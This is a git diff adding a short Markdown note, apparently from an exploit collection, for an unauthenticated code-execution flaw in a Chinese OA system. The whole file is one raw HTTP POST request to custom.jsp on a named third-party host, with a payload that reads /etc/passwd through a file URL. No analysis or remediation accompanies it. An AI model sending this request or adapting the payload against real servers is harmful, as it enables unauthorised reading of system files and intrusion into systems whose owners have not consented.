diff --git a/某凌OA前台代码执行.md b/某凌OA前台代码执行.md
new file mode 100644
index 0000000..fc15f8e
--- /dev/null
+++ b/某凌OA前台代码执行.md
@@ -0,0 +1,11 @@
+## 某凌OA前台代码执行
+```
+POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
+Host: www.ynjd.cn:801
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: /
+Connection: Keep-Alive
+Content-Length: 42
+Content-Type: application/x-www-form-urlencoded
+var={"body":{"file":"file:///etc/passwd"}}
+```